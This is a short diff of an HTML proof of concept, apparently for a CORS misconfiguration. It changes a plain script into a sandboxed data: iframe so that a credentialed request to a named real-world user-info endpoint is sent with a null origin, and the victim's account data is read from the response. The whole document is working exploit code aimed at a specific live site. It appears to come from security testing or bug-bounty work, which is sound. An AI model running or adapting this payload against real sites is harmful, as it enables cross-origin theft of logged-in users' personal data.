--- a/cors.html
+++ b/cors.html
@@ -1,5 +1,6 @@
-<html>
-<script type="text/javascript">
+<!--ifname Origin:null-->
+<iframe sandbox="allow-scripts allow-top-navigation allow-forms" 
+src='data:text/html,<script>
 var req = new XMLHttpRequest();
 req.onload = reqListener;
 req.open("get","https://institute.tencentmusic.com/auth/get_user_info",true);
@@ -7,6 +8,5 @@ req.withCredentials = true;
 req.send();
 function reqListener() {
 alert(this.responseText);
-};
-</script>
-</html>
+};</script>'>
+</iframe>
